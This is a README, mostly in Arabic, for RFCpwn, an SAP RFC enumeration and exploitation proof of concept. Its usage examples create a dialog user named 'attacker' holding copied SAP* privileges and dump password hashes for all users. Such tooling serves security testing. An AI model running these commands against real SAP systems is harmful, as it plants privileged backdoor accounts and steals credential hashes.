
أداة تعداد واستغلال تستخدم استدعاءات RFC لـ SAP
مجموعة أدوات لاستكشاف واستغلال SAP باستخدام استدعاءات RFC
Twitter: @icryo
هذه مجموعة أدوات لإظهار تأثير اختراق حسابات الخدمة.
إثبات المفهوم هذا ليس للاستخدام في بيئات الإنتاج، ولا يوجد ضمان للاستقرار أو الدعم.
RFCpwn يعتمد على pyrfc والمكتبات المقدمة من SAP في: https://github.com/SAP/PyRFC#installation
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]
An Impacket style enumeration and exploitation tool using SAP RFC calls
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
Authentication:
-ip IP <targetName or address>
-u Username RFC Users Username
-p Password RFC Users Password
-c Client Client- eg.000
-s Sysid System Number- eg 00
-ping RFC Ping Command
User Abuse:
-enum Use to enumerate a specific user
-usercopy add a Dialog User
-user USER Required for -usercopy and -userenum to specify the user
-copy COPY User to be copied required for -usercopy
-pw PW password of new user for -usercopy
Hash Collection:
-dump Dump hashes use with below
-exp EXPERIMENTAL - Dump BCODE / PASSCODE hashes
اختبار الاتصال
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
نسخ صلاحيات مستخدم إلى مستخدم حوار جديد. إذا لم يتم تحديد -copy، يتم استخدام SAP*.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1
تفريغ التجزئات من جميع المستخدمين. الخيار -exp للتجزئات التجريبية bcode وpasscode.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump
